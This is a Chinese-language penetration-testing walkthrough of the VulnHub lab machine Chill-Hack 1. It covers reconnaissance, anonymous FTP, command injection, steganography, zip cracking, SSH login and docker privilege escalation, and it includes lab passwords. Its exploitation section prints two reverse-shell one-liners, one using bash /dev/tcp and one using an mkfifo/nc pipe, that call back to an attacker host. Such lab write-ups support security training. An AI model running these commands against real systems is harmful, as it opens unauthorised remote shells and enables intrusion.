VulnHub-Chill-Hack 1 靶场渗透实验

VulnHub-Chill-Hack 1 靶场渗透实验

一、信息收集

1、收集靶机的ip

 nmap来扫描存活的主机

VulnHub-Chill-Hack 1 靶场渗透实验

nmap -sn 192.168.226.0/24( -v表示显示过程)

根据扫描的结果,可以继续验证目标靶机的ip

 

VulnHub-Chill-Hack 1 靶场渗透实验

确定目标靶机地址是192.168.226.131

 

 

2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况

nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv

-sC   –script=default   默认的脚本扫描,主要是搜集各种应用服务的信息

-sV     端口服务及版本

 

Discovered open port 22/tcp on 192.168.226.131

Discovered open port 21/tcp on 192.168.226.131

Discovered open port 80/tcp on 192.168.226.131

猜想可行的入侵方向:

(1)21端口存在匿名用户登录的利用方式

(2).80端口是Apache httpd 2.4.29 可能存在换行解析漏洞,可能可以利用

 

(1).匿名登录ftp,下载并查看note.txt文件,得到一个提示

VulnHub-Chill-Hack 1 靶场渗透实验

(2)登录自带的web网站,静态网站,发现没有可以利用的后台数据库,没有漏洞点

VulnHub-Chill-Hack 1 靶场渗透实验

使用目录扫描工具dirb,对这个静态网站的目录进行扫描,进一步信息收集

VulnHub-Chill-Hack 1 靶场渗透实验

发现secret目录,可能存在命令执行漏洞

bash -i >& /dev/tcp/192.168.226.132/6666 0>&1

 

二、边界突破

1、漏洞利用

ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.226.132 6666>/tmp/f

 

反弹shell执行环境   使用nc来配合

 

2、横向扩展

 

sudo -l 查看我能执行的高权限指令和文件

发现helpline.sh

利用脚本文件,进行二次命令执行

最终拿到了用户flags

VulnHub-Chill-Hack 1 靶场渗透实验

继续尝试,找root的flags

在/var/www/files路径中发现hacker.php,查看文件内容,得到提示

VulnHub-Chill-Hack 1 靶场渗透实验

将图片下载到本地

VulnHub-Chill-Hack 1 靶场渗透实验

使用steghide可以将信息提取出来,得到backup.zip,解密需要密码

VulnHub-Chill-Hack 1 靶场渗透实验

使用fcrackzip工具暴力破解zip密码,使用kali系统自带的/usr/share/wordlists/rockyou.txt字典

得到密码 pass1word

解压得到source_code.php

VulnHub-Chill-Hack 1 靶场渗透实验

根据文件内容可以判断出这是登录页面的程序,判断输入的密码是否正确

密码:!d0ntKn0wmYp@ssw0rd

 

猜测密码是ssh用户的,查看ssh用户名anurodh

 

使用ssh登录,在登录anurodh用户

VulnHub-Chill-Hack 1 靶场渗透实验

搜索docker获取相关信息,得到提权命令,获取root权限

VulnHub-Chill-Hack 1 靶场渗透实验

成功!

VulnHub-Chill-Hack 1 靶场渗透实验

上一篇:《编写可读代码的艺术》《第5章 该写什么样的注释》


下一篇:浏览器的兼容性